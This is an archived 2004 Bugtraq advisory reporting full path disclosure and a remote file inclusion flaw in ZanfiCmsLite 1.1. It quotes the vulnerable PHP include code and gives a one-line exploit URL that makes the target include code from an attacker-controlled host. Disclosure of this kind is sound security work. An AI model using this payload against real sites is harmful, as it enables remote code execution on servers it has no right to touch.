[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Multiple vulnerabilities in ZanfiCmsLite

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Multiple vulnerabilities in ZanfiCmsLite
From: Lin Xiaofeng <Cracklove@xxxxxxxxx>
Date: 11 Oct 2004 12:59:48 -0000


********************************** 
*AuThor:Cracklove                * 
*emA!l:Cracklove[at]Gmail[dot]Com* 
*HoMePaGe:http://ProxySky.com    * 
********************************** 

[Info] 

Website: http://www.zanfi.nl 
Version: 1.1,The Newest Version 
Problem: Full path disclosure,Include file 

[Vuls] 

1.Full path disclosure: 

Let's try to request like this: 

http://localhost/cms/adm_pages.php 

and we get standard error messages like that: 

Warning: mysql_query(): supplied argument is not a valid MySQL-Link resource in 
c:\appserv\www\cms\adm_pages.php on line 2 
No blocks in the table 

The Problem also in 
corr_pages.php,del_block.php,del_page.php,footer.php,home.php etc. 


2.Include file 

Ok let's open ./index.php,We see 

if (!isset($inc)): 
    include ("home.php"); 
else: 
    include ($inc.".php"); 
endif; 

O Yeah!See u Again Include Vul! 

[Exploit] 

http://target/index.php?inc=http://[Attacker] 

[Fix] 

Vuls has been reported to autuor,No reply yet. 

[Greetings] 

Greets To Lcx,Fatb,Envymask,S4T,ITS,CHT,WDYL,~The WhackerZ~ TeAm. 

http://www.proxysky.com/vulz/show.php?id=3

Prev by Date: [SECURITY] [DSA 458-3] New python2.2 packages really fix buffer overflow and restore functionality
Next by Date: Micronet wireless broadband router SP916BM admin password reset when power off
Previous by thread: [SECURITY] [DSA 458-3] New python2.2 packages really fix buffer overflow and restore functionality
Next by thread: Micronet wireless broadband router SP916BM admin password reset when power off
Index(es):
- Date
- Thread